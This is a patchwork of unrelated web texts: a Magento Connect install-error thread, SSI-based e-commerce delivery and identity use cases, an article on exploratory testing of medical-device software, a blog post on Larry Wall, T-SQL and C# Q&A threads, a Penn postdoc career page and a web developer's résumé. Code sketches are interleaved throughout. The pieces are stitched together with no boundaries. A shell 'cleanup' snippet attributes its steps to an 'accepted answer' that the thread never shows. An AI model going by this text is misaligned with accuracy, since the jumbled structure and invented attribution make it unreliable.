I added: cms/business_terms => Allowed but nothing changed

actually do you want to change/create a cms page or any block types?

...it works!! I just filled in "cms/block" and all is fine! all missing content is shown now! Raghu, thank you so much for your help!! :-)

Here is my Magento Connect (without Mage_All_Latest): As you see: no magento files...
so I tried to install Mage_All_Latest with this code: http://connect20.magentocommerce.com/community/Mage_All_Latest Then, after Magento worked, I got the following log:

Checking dependencies of packages
Already installed: community/Interface_Frontend_Rwd_Default <IP_ADDRESS>, skipping
Already installed: community/Mage_Locale_en_US <IP_ADDRESS>, skipping
Already installed: community/Lib_Unserialize <IP_ADDRESS>, skipping
Already installed: community/Lib_IDNA2 <IP_ADDRESS>, skipping
CONNECT ERROR: Package 'Mage_All_Latest' is invalid '.\pkginfo\Mage_All_Latest.txt' already exists
Package 'Interface_Adminhtml_Default' is invalid './app/design\adminhtml\default\default\etc\theme.xml' already exists
Package 'Interface_Frontend_Default' is invalid './app/design\frontend\default\default\etc\theme.xml' already exists
Package 'Interface_Install_Default' is invalid './app/design\install\default\default\etc\theme.xml' already exists
Package 'Mage_Downloader' is invalid '.\downloader\js\prototype.js' already exists
Package 'Mage_Centinel' is invalid './app/code/core\Mage\Centinel\Block\Adminhtml\Validation\Form.php' already exists
Package 'Interface_Frontend_Base_Default' is invalid './app/design\frontend\base\default\etc\theme.xml' already exists
Package 'Phoenix_Moneybookers' is invalid './app/code/community\Phoenix\Moneybookers\Block\Form.php' already exists
Package 'Mage_Compiler' is invalid './app/code/core\Mage\Compiler\Block\Process.php' already exists
Package 'Magento_Mobile' is invalid './app/code/core\Mage\XmlConnect\Block\Adminhtml\Admin\Application\Edit\Form.php' already exists
Package 'Lib_Cm' is invalid './lib\Cm\Cache\Backend\Redis.php' already exists
Package 'Cm_RedisSession' is invalid './app/code/community\Cm\RedisSession\Model\Session.php' already exists
Package 'Mage_Core_Adminhtml' is invalid './app/code/core\Mage\Adminhtml\Block\Abstract.php' already exists
Package 'Mage_Core_Modules' is invalid './app/code/core\Mage\Admin\Helper\Data.php' already exists
Package 'Lib_Js_Ext' is invalid '.\js\extjs\css\README.txt' already exists
Package 'Lib_LinLibertineFont' is invalid './lib\LinLibertineFont\Bugs' already exists
Package 'Lib_Js_TinyMCE' is invalid '.\js\tiny_mce\classes\AddOnManager.js' already exists
Package 'Lib_Varien' is invalid './lib\Varien\Autoload.php' already exists
Package 'Lib_Google_Checkout' is invalid Empty package contents section
Package 'Lib_Js_Calendar' is invalid '.\js\calendar\calendar-blue.css' already exists
Package 'Lib_Js_Mage' is invalid '.\js\lib\FABridge.js' already exists
Package 'Lib_Phpseclib' is invalid './lib\phpseclib\Crypt\AES.php' already exists
Package 'Lib_Mage' is invalid './lib\Mage\Archive\Abstract.php' already exists
Package 'Lib_Magento' is invalid './lib\Magento\Autoload\ClassMap.php' already exists
Package 'Lib_Credis' is invalid './lib\Credis\Client.php' already exists
Package 'Lib_Pelago' is invalid './lib\Pelago\Emogrifier.php' already exists
Package 'Lib_ZF' is invalid './lib\Zend\Acl\Assert\Interface.php' already exists
Package 'Lib_Js_Prototype' is invalid '.\js\prototype\debug.js' already exists
Package 'Lib_ZF_Locale' is invalid './lib\Zend\Locale\Data\Translation.php' already exists

Hello and welcome to Stack Exchange. This is not an answer. Please add your question details to the question itself by editing it.
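For reference, the cleanup that resolved the thread (restore var/package from a clean download of the same Magento version, then delete the stale pkginfo marker) can be sketched as a shell snippet. Both paths are placeholders to adjust for your installation:

```shell
# Hedged sketch of the cleanup steps from the accepted answer.
# MAGENTO_ROOT is your store's document root; FRESH_MAGENTO is an
# unpacked, freshly downloaded copy of the same Magento version.
MAGENTO_ROOT="${MAGENTO_ROOT:-$PWD/magento}"
FRESH_MAGENTO="${FRESH_MAGENTO:-$HOME/fresh-magento}"

mkdir -p "$MAGENTO_ROOT/var"

# 1) Restore the stock package metadata from the clean download.
if [ -d "$FRESH_MAGENTO/var/package" ]; then
    cp -r "$FRESH_MAGENTO/var/package" "$MAGENTO_ROOT/var/"
fi

# 2) Drop the stale marker so Connect no longer believes
#    Mage_All_Latest is already installed.
rm -f "$MAGENTO_ROOT/pkginfo/Mage_All_Latest.txt"
echo "cleanup done"
```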
In the context of the ENSURESEC e-commerce ecosystem, the proposed use cases will use the Ecommerce-SSI Bridge to implement the following workflows. Secure Goods Distribution Delivery Company Identity and Scanners Verification Problem: Protection of a Delivery. Company X wants to protect its goods from being handled by unauthorized carriers, and from threats and fraud in the distribution chain. - An authorized employee of delivery company X uses the Ecommerce-SSI Bridge to register an identity (DID) for their organization. - An e-commerce operator verifies the delivery company’s organization identity and uses the Bridge to issue a credential for the company to deliver on their behalf. The credential contains the company organization DID and is signed by the e-commerce operator’s private key, which had been previously associated with the operator’s identity. - The authorized employee of the verified delivery company registers a DID for each scanner (e.g., Android scanners) used by the company couriers. - The authorized employee uses the Ecommerce-SSI Bridge to issue authorization credentials to the scanner devices used to handle deliveries. These credentials are stored locally in the scanner devices. - When a courier hands over the delivery, the scanner device uses the Ecommerce-SSI Bridge to present its credential to the e-commerce operator. - The e-commerce operator uses the Ecommerce-SSI Bridge to verify that the parcel was only handled by an authorized courier, and that it was not stolen or diverted in transit. This is possible because of the verification of the device handling the scanning of the delivery. - (optional) The customer can acquire the courier’s scanner device credential in the form of a QR code. The QR code can be read using a mobile phone and the Ecommerce-SSI Bridge to verify that the scanner device belongs to a delivery company authorized by the e-commerce operator. This allows for verifying authentic deliveries.
Customer Identity and Delivery Verification Problem: Proof of Collection. Customers and e-commerce providers want to guarantee goods are collected by the right customer and avoid threats and fraud in the distribution chain. - A customer creates a decentralized identity (DID) using a mobile application. This application can be a standalone credential wallet or an e-commerce shopping app. - The customer performs a purchase on an e-commerce site. - The e-commerce site uses the Ecommerce-SSI Bridge to issue a proof of purchase credential to the customer, which is saved to the customer’s phone. - The customer receives the product delivery and presents the credential in a QR code to the courier scanner. - The courier acquires the credential and uses the Ecommerce-SSI Bridge to verify its authenticity. The delivery is safely handed over to the right customer. - (optional) The customer acquires the courier’s scanner credential (see Delivery Company Identity and Scanners Verification) and uses the Ecommerce-SSI Bridge to verify that it belongs to an authorized delivery company, assuring the customer that the delivery is legitimate. The two scenarios above become even more interesting in the case of automated (e.g., drone) delivery and could even include product identification. Secure E-commerce Sales Customer Identity and Credential Age Verification Problem: Verify a customer’s identity while avoiding collecting and storing personal information. This would increase compliance and reduce liability for e-commerce operators and small sellers. - An authorized bank employee registers an organization decentralized identity (DID) for its bank. - A customer creates a decentralized identity (DID) using a mobile application, which could be a standalone credential wallet or an e-commerce shopping app. - The customer requests an Issuer (e.g. a bank) to issue a credential stating their age.
- The Issuer uses previously verified information about the user held on local record and the Ecommerce-SSI Bridge to create and issue a verifiable credential to the customer. - The customer (the Owner) downloads the credential in their app using a credential wallet. - The customer purchases an item that requires age verification on an e-commerce site. - The customer provides their credential to the e-commerce website using the Ecommerce-SSI Bridge. - The e-commerce site uses the Ecommerce-SSI Bridge to verify the credential and authorize the purchase. A similar scenario can be applied in the online purchase of dedicated drugs for specific health conditions. A general practitioner could issue a credential to the customer stating their condition. Seller Identity Verification Problem: Verify a seller's identity. This verification would reduce small sellers' compliance burden and reputation risks. - An e-commerce site allows an employee, whom the seller previously authorized, to create a decentralized identity (DID for organization) using the Ecommerce-SSI Bridge. - The seller requests an Issuer (e.g. its bank) to issue a credential stating its Know Your Customer (KYC) status. - The seller presents the credentials to the e-commerce site operator using the Ecommerce-SSI Bridge. - The e-commerce site operator verifies the seller’s credentials using the Ecommerce-SSI Bridge and allows the seller to trade on its marketplace. Product Identity and Authenticity Problem: Verify product authenticity. This verification would reduce counterfeiting. - An e-commerce site allows the seller to create a decentralized identity for each of its products (DID for objects) using the Ecommerce-SSI Bridge. - The e-commerce site allows the seller to create and sign an authenticity credential associated with a given product identity using the Ecommerce-SSI Bridge. - A user app allows a customer to obtain the product authenticity credential.
The customer could achieve this by scanning a QR code from an e-commerce site, or the credential could even be directly attached to the purchased product. - A user app allows the customer to verify the signature of the product authenticity credential using the Ecommerce-SSI Bridge, allowing verification of the seller's identity.
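The issue/verify pattern that recurs in all of the workflows above can be sketched in miniature. This is a simplified stand-in, not the Ecommerce-SSI Bridge API: a symmetric HMAC key plays the role of the issuer's signing key, whereas real SSI credentials use asymmetric DID key pairs anchored on a distributed ledger:

```python
import hashlib
import hmac
import json
import secrets

# Simplified stand-in for the issue/verify flow above. Real verifiable
# credentials are signed with the issuer's asymmetric DID key; an HMAC
# key is used here only to keep the sketch dependency-free.

def issue_credential(issuer_key: bytes, subject_did: str, claims: dict) -> dict:
    """Issuer (e.g. a bank) signs claims about a subject DID."""
    payload = json.dumps({"sub": subject_did, "claims": claims}, sort_keys=True)
    sig = hmac.new(issuer_key, payload.encode(), hashlib.sha256).hexdigest()
    return {"payload": payload, "signature": sig}

def verify_credential(issuer_key: bytes, credential: dict) -> bool:
    """Verifier (e.g. the e-commerce site) checks the issuer's signature."""
    expected = hmac.new(issuer_key, credential["payload"].encode(),
                        hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, credential["signature"])

bank_key = secrets.token_bytes(32)                       # issuer's secret
cred = issue_credential(bank_key, "did:example:alice", {"over_18": True})
assert verify_credential(bank_key, cred)                 # accepted as issued
cred["payload"] = cred["payload"].replace("true", "false")
assert not verify_credential(bank_key, cred)             # tampering detected
```

The age-verification workflow maps directly onto this shape: the bank issues the `over_18` claim once, and any e-commerce site can later verify it without ever storing the customer's date of birth.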
By David Borcherding, Seapine Software, Inc.

More and more medical devices have some sort of software component. The teams responsible for testing this software often rely on scripted testing, both manual and automated, to decrease the risk of defects in a product under development. Scripted testing is documented in test plans or test protocols, with test cases or test procedures, and with documented evidence of the results of each test run. The problem with this approach is that scripted testing is not designed to identify error conditions in scenarios that deviate significantly from the design or requirements, even if a comprehensive risk management plan is followed. To find these hidden or divergent risks, you need to go off script, and that’s where adding exploratory testing can help.

Exploratory testing — sometimes called usability testing, use testing, user testing, or formative evaluation — is the hands-on, simulated-use testing done to discover and explore unanticipated hazards. It’s almost impossible to plan tests that cover every variation in data, configuration, interaction, sequence, timing, and so on. Scripted tests are designed to ensure that the product meets the requirements (using new-feature test cases) and to mitigate the risk of new features breaking existing functionality (via regression test cases). Experienced testers can anticipate issues that might occur, but it may be too costly or time-consuming to write a test case for every scenario that comes to mind.

In her book Explore It! Reduce Risk and Increase Confidence with Exploratory Testing, Elisabeth Hendrickson says the best test strategy answers two core questions:
- Does the software behave as intended under the conditions it’s supposed to be able to handle?
- Are there any other risks?

Scripted testing can answer the first question, but to find those potentially critical “other risks,” you need to explore.
Push The Envelope

Exploratory testing puts the thinking back in the hands (or rather, the head) of the tester. As an exploratory tester, you design the test, you execute it immediately, you observe the results, and you use what you learn to design the next test. You’re not just following steps in a test case someone else created; you’re pushing the application or product to its limits to gain a better understanding of how it works and where it breaks. You see it from the user’s point of view, rather than the developer’s. Ultimately, you get a more complete view of the product — including its weaknesses and hidden risks.

Discover More Defects

On average, 11 percent more overall software defects are discovered through exploratory testing vs. scripted testing. For defects that should be immediately obvious, such as a missing button in the user interface, exploratory testing discovers 29 percent more vs. scripted. When it comes to “complex” bugs (bugs requiring three or more user actions to cause an error or failure), it jumps to 33 percent more defects found. (Source: Defect Detection Efficiency: Test Case Based vs. Exploratory Testing)

The reason you find more defects when using an exploratory method is that you have more latitude to try different types of tests, using your past experience and knowledge of the product. Scripted testing, on the other hand, limits you to only the steps outlined in test cases, which, in turn, limits your ability to consider other test scenarios. There are numerous reasons why test cases don’t always lead to finding bugs, such as how well the test case was written (did the analyst understand the requirement?), who wrote the test case (is the analyst writing the test case knowledgeable about how the product works?), how well the requirements document described new functionality, and so on.
Even if you had perfect test cases, exploratory testing would still find more defects over the course of a release, for several reasons:
- You tend to find a good number of defects when “testing around” functional areas while verifying defects. Fixing an issue often breaks something else.
- If a defect exists and is not found while executing the initial test run (following the test case steps), it is unlikely that the next tester running the same test will find the defect. However, exploratory testing in the same functional area may reveal the bug.
- Exploratory testing allows you to think outside the box and come up with use cases that might not be covered in a test case. For example, you might perform one test and then ask yourself, “What if I tried this? What if I didn’t do that?”
- Some defects, typically the hard ones to find, depend on a sequence of events. If you don’t have really deep test cases, you can miss defects that exploratory testing can find in a less-structured, longer test session.

Find The Most Important Defect In The Shortest Time

Because you are not bound by the test case steps, exploratory testing makes finding important defects faster. Essentially, it allows you to cover more ground and focus on testing the “what ifs.” For example, let’s say you’re assigned to test the “Edit Patient Name” functional area in a product. There are two possible scenarios for your assignment:
- Execute a test run, or
- Perform exploratory testing on the “Edit Patient Name” functional area.

In the first scenario, you would follow the steps outlined in the test case to verify that each step works, reporting any bugs that are found. But what if the most important bug — the one that crashes the application and deletes the user’s data — doesn’t occur during these steps? You won’t find it. In the second scenario, you explore or “test around” editing the patient name. At first, you might perform the same steps as at the beginning of the test case.
As testing progresses, however, you might ask, “What happens when I click Edit, delete the name, and try to save the patient name with a blank field?” And boom, the application crashes and deletes all of the user data. You just found the most important bug by exploring something that wasn’t a step in the test case.

Exploratory Testing Feeds Scripted Testing

When exploratory software test sessions are recorded, they can easily be converted into repeatable test cases or regression tests without the need for you to take notes in a separate document or notebook. A test session recording application records all activity and builds a detailed history of the test session, including descriptions of the user interface controls used and a screenshot of every step with the relevant graphical user interface (GUI) element automatically highlighted. Once you’re done exploring, the app generates a step-by-step written script of the test steps in plain English. You can then save this script as a test case in your test case management solution. Test session recording apps also simplify defect reporting for risks found in exploratory test sessions, because they make it easy to go back and reproduce the error. Steps and screens are automatically captured, so there’s no need to do all of that manually when submitting an issue to development and documenting a risk mitigation with a test case.

Fill The Gap

As corporate belts tighten and cause reductions in testing budgets and staff, you might be tempted to settle for a documented test approach because you know it will satisfy your company’s quality standards or auditors. All that really does, however, is open the door to risk. Combining exploratory testing with mandated, documented scripted testing can help fill the gap left by shrinking resources, keep your test effort strong, and reduce the risk of issues in the final product.
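The “Edit Patient Name” scenario can be made concrete with a toy example. Everything here is invented for illustration — the function, its validation, and the blank-name bug (which silently corrupts the record rather than crashing the application):

```python
# Hypothetical "Edit Patient Name" logic; the blank-name bug is invented
# to mirror the scenario in the article.

def save_patient_name(record: dict, new_name: str) -> dict:
    # Bug: only None is rejected, so an empty string slips past
    # validation and overwrites the stored name.
    if new_name is None:
        raise ValueError("name required")
    record["name"] = new_name
    return record

# Scripted test: follows the written steps, happy path only -> passes,
# and the defect stays hidden.
rec = save_patient_name({"name": "Jane Doe"}, "Jane Q. Doe")
assert rec["name"] == "Jane Q. Doe"

# Exploratory probe: "what if I save with a blank field?" The blank name
# is accepted and saved -- the exploratory session exposes the bug.
rec = save_patient_name({"name": "Jane Doe"}, "")
assert rec["name"] == ""
```

Once a probe like this finds the defect, the probe itself becomes the new regression test case — exactly the “exploratory testing feeds scripted testing” loop described above.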
Three Innovator Lessons from Larry Wall

Who is Larry Wall? Many of you may not know who he is. He is the father of Perl, a programming language especially popular among system administrators. He created Perl in the mid-1980s. You may never have heard of his work, but there is something we can learn from his life as a programmer and innovator. Today I want to share three attributes of innovators, inspired by Larry Wall as he is described in the book Learning Perl, by Randal L. Schwartz, Tom Phoenix, and brian d foy (I have no idea why the last name is written in lower case).

1) Be Lazy

Some people diligently work on the same thing over and over. Larry does not follow that status quo; he is lazy. Larry was trying to produce some reports from Usenet news (a kind of discussion forum that was a precursor of the web forums available nowadays). Being the lazy programmer he is, he decided to overkill the problem with a generic solution that he could also use in at least one other place. This is the laziness that he also puts in the three virtues of programmers:

Laziness – The quality that makes you go to great effort to reduce overall energy expenditure. It makes you write labor-saving programs that other people will find useful, and document what you wrote so you don’t have to answer so many questions about it.
Larry Wall, Randal L. Schwartz and Tom Christiansen (Programming Perl)

2) Be Greedy

Larry created Perl because he wanted the advantages of both sides of programming languages. On one side is low-level programming (C or C++), which is hard to write but fast and unlimited. On the other side is high-level ("shell") programming, which is slow and limited but easier to code. Larry was not satisfied with either of them. He chose to create something that would incorporate the strengths of the two. And so Perl was born: easy, nearly unlimited, mostly fast, and kind of ugly.
3) Be Ugly

Larry knew very well what he wanted to create with Perl. He chose to trade off certain things for the goal he pursued. He knew that he could not please everyone. When he had to choose between features that make a programmer's life easier but make the language harder for a student to learn, he picked the programmer's side. Perl has many conveniences that let programmers save time, and that is why Perl looks ugly to beginners. If you're not an experienced Perl programmer, you will need some time to understand all the code and shortcuts.

Perl is symbolized by a camel. A camel is kind of ugly too, but it works hard. A camel gets the job done even in tough conditions like the desert, even if it looks ugly and smells worse, or sometimes even spits at you.

These are not all the attributes an innovator needs, but they are exactly the attributes that not many people consider virtues. Larry turned these limitations into advantages; they became something beneficial to his life as a programmer and innovator. Despite the laziness, Larry took pride in and believed in his solution. He worked hard at it. He introduced Perl to the community of users, and that was followed by a stream of feedback and questions. Larry did not grow weary of responding; he consistently grew his work on Perl. Now Perl is widely recognized, installed on nearly every system in use today, with thousands of pages of online documentation, dozens of books, and several mainstream newsgroups and discussion forums. It is the fruit of Larry Wall's work.
TSQL concatenate parameters

I'm attempting to determine why my stored procedure will not operate correctly. The issue is when I utilize a concatenated parameter. When finished, I will have 6 or 7 of these, each built upon the last. I've tried every variation including =, like, %, spaces, no spaces, and cannot come up with the correct syntax to make this operational. I have also done a 'hard coded' test, and it works fine, so the data is correct. HELP! Thanks

Here's the code -

ALTER PROCEDURE [dbo].[rspSCLTEST]
    (@RRID as varchar(4), @State as varchar(2), @Sub as varchar(75))
AS
BEGIN
    SET NOCOUNT ON;
    DECLARE @SQL as varchar(4000)
    SET @SQL = @State

    --add the subdivision to the where statement
    If @Sub = 'ALL'
        SET @SQL = @SQL
    ELSE
        SET @SQL += ' AND (C.SubDivision = ' + @Sub + ')'

    SELECT C.CRID, C.DOT, C.RR, C.Pref, C.MP, C.Division, C.SubDivision, C.City, C.Street,
           C.State, C.County, C.RestrictedCounty, C.Remarks, C.SpecialInstructions, C.Route,
           C.ThirdAppRequired, C.MainTrks, C.OtherTrks, C.OnSpur, C.MaxSpeed, C.SubContracted,
           C.FenceEncroachment, C.Lat, C.Long, C.PropertyType, C.WarningDevice, C.Surface,
           C.ROWNE, C.ROWNW, C.ROWSE, C.ROWSW, C.ROWWidth, C.ExtNE, C.ExtNW, C.ExtSE, C.ExtSW,
           C.TempActive, C.PCO, A.App1Date, A.App1Cut, A.App1Spray, A.App1Inspect,
           A.App2Date, A.App2Cut, A.App2Spray, A.App2Inspect,
           A.App3Date, A.App3Cut, A.App3Spray, A.App3Inspect
    FROM Crossings AS C
    LEFT OUTER JOIN AppData AS A ON C.CRID = A.CRID
    WHERE (C.DeletedCrossing = 0) AND (C.RR = @RRID) AND C.State = @SQL
END

you need to work on your question first, post some code

I think you are trying to concatenate parameters; if so, use the + operator.

The problem is that you are confusing dynamic SQL with parameter replacement.
Try something like this:

and c.state = @state
and (@sub = 'ALL' or c.subdivision = @sub)

The way you had this written, you were checking for:

and c.state = '<state> and c.subdivision = @sub'

That is, the second clause is not being interpreted as a clause; it is being interpreted as part of the state.

the issue here is that if @sub = 'ALL', I don't need the parameter included at all. "ALL" means give me all of the subdivisions, not just the one I'm asking for. I've also attempted to say If @Sub = 'ALL' SET @SQL = @SQL + '(C.SubDivision = ' + C.SubDivision + ')'

@CindyBrozyno . . . that is what this logic does.

How would this work when you have a field with datatype BIT, and not varchar? For instance, Field = SubContracted. The user can choose to see all that ARE subcontracted, all that ARE NOT subcontracted, or ALL records.

@CindyBrozyno . . . something like field = (case when @t = 'subcontracted' then 1 when @t = 'all' then field else 0 end). Same idea but with three values.

This line:

SET @SQL += ' AND (C.SubDivision = ' + @Sub + ')'

And this line:

AND C.State = @SQL

appear suspect. I can only make assumptions about your data, but it looks like you've got two different objects: State and Sub-division. What kind of data is in C.State? Is it just state abbreviations (OR, WA, MO, MN, AZ, etc.)? If so, you'll never get a positive result out of WHERE C.State = WA123 (assuming '123' is a sub-division value). In any case, could you do something like this?

WHERE C.State = @state AND C.Subdivision = @sub
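The suggested fix (make the clause tolerate 'ALL' instead of concatenating strings) can be demonstrated end to end. This is a sketch in Python with SQLite standing in for SQL Server, using a made-up three-column table rather than the real Crossings schema; only the `(:sub = 'ALL' OR subdivision = :sub)` pattern is the point.

```python
import sqlite3

# Hypothetical minimal schema standing in for the Crossings table.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE crossings (crid INTEGER, state TEXT, subdivision TEXT)")
conn.executemany(
    "INSERT INTO crossings VALUES (?, ?, ?)",
    [(1, "WA", "North"), (2, "WA", "South"), (3, "OR", "North")],
)

def get_crossings(state, sub):
    # The optional-filter pattern: when sub is 'ALL' the second clause is
    # true for every row, so no dynamic SQL or string concatenation is needed.
    return conn.execute(
        """SELECT crid FROM crossings
           WHERE state = :state
             AND (:sub = 'ALL' OR subdivision = :sub)
           ORDER BY crid""",
        {"state": state, "sub": sub},
    ).fetchall()

print(get_crossings("WA", "ALL"))    # every WA subdivision
print(get_crossings("WA", "North"))  # only the matching subdivision
```

The same shape drops straight into the stored procedure's WHERE clause, with @State and @Sub bound as ordinary parameters.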
What design pattern to use when you need derived class field values but you only have base class field variables?

Consider the following code:

abstract class Player {
    abstract Stats getStats();
}
abstract class RangedPlayer : Player {
    RangedStats rangedStats;
    override Stats getStats() { return rangedStats; }
}
abstract class MeleePlayer : Player {
    MeleeStats meleeStats;
    override Stats getStats() { return meleeStats; }
}
class Stats {
    int maxHealth;
}
class RangedStats : Stats {
    int maxAmmo;
}
class MeleeStats : Stats {
    int meleeComboLength;
}
abstract class ThingPlayersCando {
    Player player;
    abstract void doThing();
}
class ThingMeleePlayersCando : ThingPlayersCando {
    abstract void doThing() {
        // getMeleeComboLength from base player class?
    }
}
class ThingRangedPlayersCando : ThingPlayersCando {
    abstract void doThing() {
        // maxAmmo from base player class?
    }
}

Here I made ThingMeleePlayersCando and ThingRangedPlayersCando both inherit from ThingPlayersCando because sometimes accessing the Player class is useful for both. But sometimes I may also want to access only things available to MeleeStats or RangedStats. The shared interface/abstract class is necessary because I want to call doThing() without needing to care about the type. The getStats() in the Player class is necessary because some things only need to know what is shared by all players (e.g. maxHealth).

I thought of the following fixes:

1. Just cast stats to the appropriate type.
2. Do away with RangedStats and MeleeStats and put all fields in a single Stats class. Simplest, and it's not like having more data fields is going to hurt.
3. Player stats is a dictionary/hashmap. Ugly.
4. Pass RangedStats/RangedPlayer in the ThingRangedPlayersCando constructor. Same for melee.

Is there a design pattern that can solve this issue in a better way?
Do the same thing with Stats as for the other classes:

class Stats {
    abstract int getStats();
}

this way you can access the stats without knowing which specialized class they are

@MarcoBeninca The problem is that MeleeStats and RangedStats shouldn't share those fields. So the implemented get functions in those classes would return meaningless values.

> What design pattern to use when you need derived class field values but you only have base class field variables?

You can create an instance of a class that has the desired values.

> But sometimes I may also want to access only things available to Melee or RangedStats.

You can create an instance of RangedStats:

RangedStats rangedStats = new RangedStats();
int health = rangedStats.maxHealth;

And IntelliSense will show you only its available methods and parameters.

I've edited your code because it does not compile:

abstract class Player
{
    public abstract Stats GetStats();
}

abstract class RangedPlayer : Player
{
    RangedStats rangedStats;
    public override Stats GetStats() { return rangedStats; }
}

abstract class MeleePlayer : Player
{
    MeleeStats meleeStats;
    public override Stats GetStats() { return meleeStats; }
}

class Stats { int maxHealth; }
class RangedStats : Stats { int maxAmmo; }
class MeleeStats : Stats { int meleeComboLength; }

and other classes:

abstract class ThingPlayersCando
{
    Player player;
    public abstract void DoThing();
}

class ThingMeleePlayersCando : ThingPlayersCando
{
    public override void DoThing() { throw new NotImplementedException(); }
}

class ThingRangedPlayersCando : ThingPlayersCando
{
    public void OnlyMyMethod() { }
    public override void DoThing() { throw new NotImplementedException(); }
}
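Fix #4 from the question (pass the concrete player type into the concrete action's constructor) deserves a concrete illustration, since it removes the casts without merging the Stats classes. The sketch below is in Python rather than C#, with names loosely mirroring the question's classes; it is one possible shape, not the only one.

```python
from dataclasses import dataclass

# Sketch of fix #4: each concrete action receives the concrete player type
# through its constructor, so shared code sees only Player while specialised
# code keeps a typed reference and never needs to cast.

@dataclass
class Stats:
    max_health: int

@dataclass
class RangedStats(Stats):
    max_ammo: int

class Player:
    def __init__(self, stats: Stats):
        self._stats = stats
    def get_stats(self) -> Stats:
        return self._stats

class RangedPlayer(Player):
    def __init__(self, stats: RangedStats):
        super().__init__(stats)
        self.ranged_stats = stats  # concrete reference kept at construction

class ThingPlayersCanDo:
    def __init__(self, player: Player):
        self.player = player
    def do_thing(self) -> str:
        raise NotImplementedError

class ThingRangedPlayersCanDo(ThingPlayersCanDo):
    def __init__(self, player: RangedPlayer):
        super().__init__(player)  # base class still sees a plain Player
        self.ranged = player      # derived class keeps the specific type
    def do_thing(self) -> str:
        return f"ammo={self.ranged.ranged_stats.max_ammo}"

# Callers only depend on the base interface; no cast appears anywhere.
action: ThingPlayersCanDo = ThingRangedPlayersCanDo(RangedPlayer(RangedStats(100, 30)))
print(action.do_thing())
```

The trade-off is that whoever constructs a ThingRangedPlayersCanDo must already hold a RangedPlayer, which is usually true at the composition root and is exactly the place where the type is known.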
Career Services works with the following postdoctoral fellows:
- Current Biomedical postdocs in Biomedical Postdoctoral Programs
- Current postdocs in the Graduate Division of Arts and Sciences
- Current postdocs in the School of Engineering and Applied Science
- Note: We are not able to see research associates or former postdocs, unless they are also Penn alumni/ae.

We have developed career-related resources and programs that are equally applicable to PhD students and postdocs, and you can find more information about these on the Grad/postdoc homepage. Whether you are thinking about doing a postdoc or are currently a postdoc at Penn, we have a range of resources on this page to help you with your career decision making.
- Thinking about doing a postdoc? Jump to information on finding opportunities and what to be thinking about
- Already a postdoc? Make the most of your time by reviewing some of these resources

Applying for Postdocs
- Advice for applying for an NRSA
- General advice from a former postdoc
- Postdoc position openings portal (STEM fields)
- Postdoc opportunities in the social sciences and humanities (organized by upcoming deadlines)

Questions that can be asked when narrowing down possible postdoc opportunities:

To current lab members:
- What is the best and worst thing about being in this lab?
- If you could change one thing about the PI, what would it be?
- If you could change one thing about the lab, what would it be?
- What is the leadership/management style of the PI?
- Do people in the lab get along?

To the PI:
- How do you run the lab? Do you allow your postdocs independence? How often do you meet with postdocs?
- In how many collaborations is the lab involved?
- Are postdocs expected to write grants for themselves?
- When would you expect me to write my first grant (the first year)?
- If I do not get my own funding, do you have enough funding to cover me for x years?
- What exactly is your funding situation (# grants, source, subject, etc.)?
- Can I help write your grants?
- Can I help TA/teach your classes? (if you want teaching experience)
- Do you have contacts in both academia and industry?
- Do people get along in your lab?

To former grad students/postdocs from the lab:
- What was the lab environment like?

Advice from former postdocs

During your time at Penn you can use our services whenever you need them. We encourage you to:
- Attend our events for new students to get information on how to make the most of our resources.
- Join us for workshops on a wide range of topics, from resumes and interviewing to offer negotiation and networking.
- Schedule a mock interview with career advisors to get feedback on your interview style and technique.
- Drop by for walk-ins to get answers from a career advisor for your quick questions.
- Set up an appointment to get your resume/CV and other job search materials reviewed and critiqued.
- Visit the funding resources section of our website to see what opportunities exist for your academic program.
- Participate in discussion panels on applying for academic jobs, and meet faculty who have been successful.
- Attend panel discussions on non-academic career options and take the opportunity to network with the speakers.
- Make use of our career planning resources as you consider your options during your degree program and after you are done.

Making the most of your postdoc
- The Role of Postdocs, PIs and Institutions in Training Future Scientists
- Advice from a Penn postdoc on having a successful postdoc experience
I'm a published photographer. Six weeks of taking pictures, thousands of miles, and hours of editing later, I'm a published photographer. Outrunning forest fires, barely missing deer at night, and the occasional fallen tree blocking all exits only made the experience more memorable. Thank you to my friend Barbara Keck who invited me along on her quest to write the ultimate guide to the people and the wineries of the Sierra Foothills. This book consists of personal stories, family recipes and a complete directory of the 10 counties of the California Sierra Foothills. Yes, I did build the website. Check it out and buy the book at Wineries Of The Sierra Foothills.

Teaching Introduction to Web Development at LaGuardia Community College

Shopify is the solution recommended by my friends at Baron Fig when I was researching an ecommerce solution for Wineries of the Sierra Foothills. It's a hosted solution that gives you extraordinary control over both the look and functionality of your site. With their templating language, you have complete control over the design of the site. Their API and webhooks allow you to integrate with a variety of third-party services and let you build your own. You get all the benefits of a hosted solution plus the control of running your own site. Check out my demo shop in progress using Bootstrap as the base.

- Web Development
- Puppy nanny
- Over 7 years of web application development experience.
- Ecommerce development on a multi-million dollar website.
- Network and server administration experience.
- Comfortable with front-end and back-end development.
- Zend Framework Certified.
- Java SE 7 Programmer Certification.
- Server Administration - Linux, Mac OS X, Windows
- Database Engines - MySQL, PostgreSQL, MS SQL Server, MongoDB
- Web Toolsets - jQuery, Symfony, CakePHP, Zend Framework, Drupal, CodeIgniter
- Development Tools - Eclipse, Netbeans, BBEdit, Ant, XDebug, Doxygen, Subversion, Git
- Testing - PHPUnit, Selenium, Jenkins

Web Instructor, LaGuardia Community College

Developed a curriculum which gives students an introduction to web development principles and teaches them basic HTML and CSS, along with commonly used frameworks and design principles.
- Set up Moodle as an online learning repository
- Scheduled industry people to come and talk to students about opportunities and challenges in web development
- Helped students with personal projects

Senior Web Developer, Experian

Developed and maintained a custom email marketing solution front-end that was integrated into the main Cheetahmail platform. API support for Amazon web services including S3 and CDN services. Additional work included working with Adobe Omniture APIs.
- Set up Gerrit for code review with a remote team.
- Provided a basic API layer to integrate 3rd parties into the main email system.
- Worked with Google on email with Adwords integration.
- Worked with a 3rd party vendor on an extensive security review and fixes to the system.

Web Application Developer, CNBC

Converted a Microsoft-provided content management solution to a PHP-based solution. Worked on architecture and implementation of the content management solution and public website. Combination of Drupal and Zend Framework libraries. Used Smarty for public website templates. Implemented Gearmand for an API-based backend for processing background jobs.

Web Application Developer, Rent The Runway

Drupal-based ecommerce site. Modules written include a customized CDN module using ImageCache, an Authorize.net checkout module using their credit card storage service, and a custom product reviews module. Also used Drupal services to provide backend support for an iPhone app.
